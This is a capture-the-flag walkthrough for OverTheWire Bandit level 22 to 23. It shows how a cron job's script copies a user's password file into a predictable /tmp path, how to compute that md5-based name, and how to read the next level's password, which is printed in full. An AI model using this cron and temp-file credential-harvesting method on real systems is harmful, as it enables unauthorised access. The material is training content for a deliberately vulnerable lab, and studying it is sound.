Bandit Level 22 → Level 23

Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

Level Answer

1. ls [FILE]

$ ls /etc/cron.d/
cronjob_bandit22  cronjob_bandit23  cronjob_bandit24  popularity-contest

2. cat [FILE]

$ cat /etc/cron.d/cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null

3. cat [FILE]

$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget

4. echo [STRING] | md5sum | cut [-d DELM] [-f LIST]

[-d] use DELIM instead of TAB for field delimiter
[-f] select only these fields;

$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349

5. cat [FILE]

$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

6. ssh [-p port] [user@]hostname

[-p port] Port to connect to on the remote host.

$ ssh -p 2220 [email protected]

Level Password

jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

Level 22 → Level 23

Bandit Level 22 → Level 23

Level Goal

Level Answer

Level Password

results matching ""

No results matching ""